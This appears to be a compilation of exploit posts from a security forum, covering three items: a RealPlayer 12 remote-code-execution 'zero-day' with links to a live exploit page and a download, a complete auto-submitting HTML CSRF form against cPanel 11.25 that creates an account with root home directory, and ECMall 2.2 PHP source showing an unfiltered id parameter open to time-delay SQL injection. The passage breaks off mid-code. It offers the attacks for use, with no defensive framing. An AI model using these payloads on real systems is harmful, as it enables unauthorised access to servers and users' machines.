【0day】Real Player 12.0.0.879 0day for WinXP

# Exploit Title: Real Player 12.0.0.879 0day for WinXP
# Date: 09/07/2010
# Author: webDEViL
# Version: 12.0.0.879
# Tested on: WinXP

This bug utilizes Microsoft Help vuln for RCE. You can test by browsing to http://krash.in/real-exp/exploit.ram

http://www.exploit-db.com/sploits/rp-0day-08-07-2010.tar

--webDEViL

【Exp】Cpanel v11.25 CSRF exploit for adding an administrator account

Cpanel v11.25 CSRF vulnerability that adds an administrator account.

Exploit:

<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="http://server:2082/frontend/x3/ftp/doaddftp.html">
<input type="hidden" name="login" value="name"/>
<input type="hidden" name="password" value="pass"/>
<input type="hidden" name="password2" value="pass"/>
<input type="hidden" name="homedir" value="/"/>
<input type="hidden" name="quota" value="unlimited"/>
</form>
</body>
</html>

Published by: G0D-F4Th3r, compiled and edited by 黑小子

Affected

【Repost】ECMall 2.2 time-delay injection 0day

ECMall 2.2 time-delay injection 0day

    function index()
    {
        $id = empty($_GET['id']) ? 0 : $_GET['id'];  // id is not filtered
        if (!$id)
        {
            $this->show_warning('no_such_groupbuy');
            return false;
        }
        // Group-buy information
        $group = $this->_groupbuy_mod->get(array(
            'conditions' => 'group_id=' . $id . ' AND gb.state<>' . GROUP_PENDING,   // OK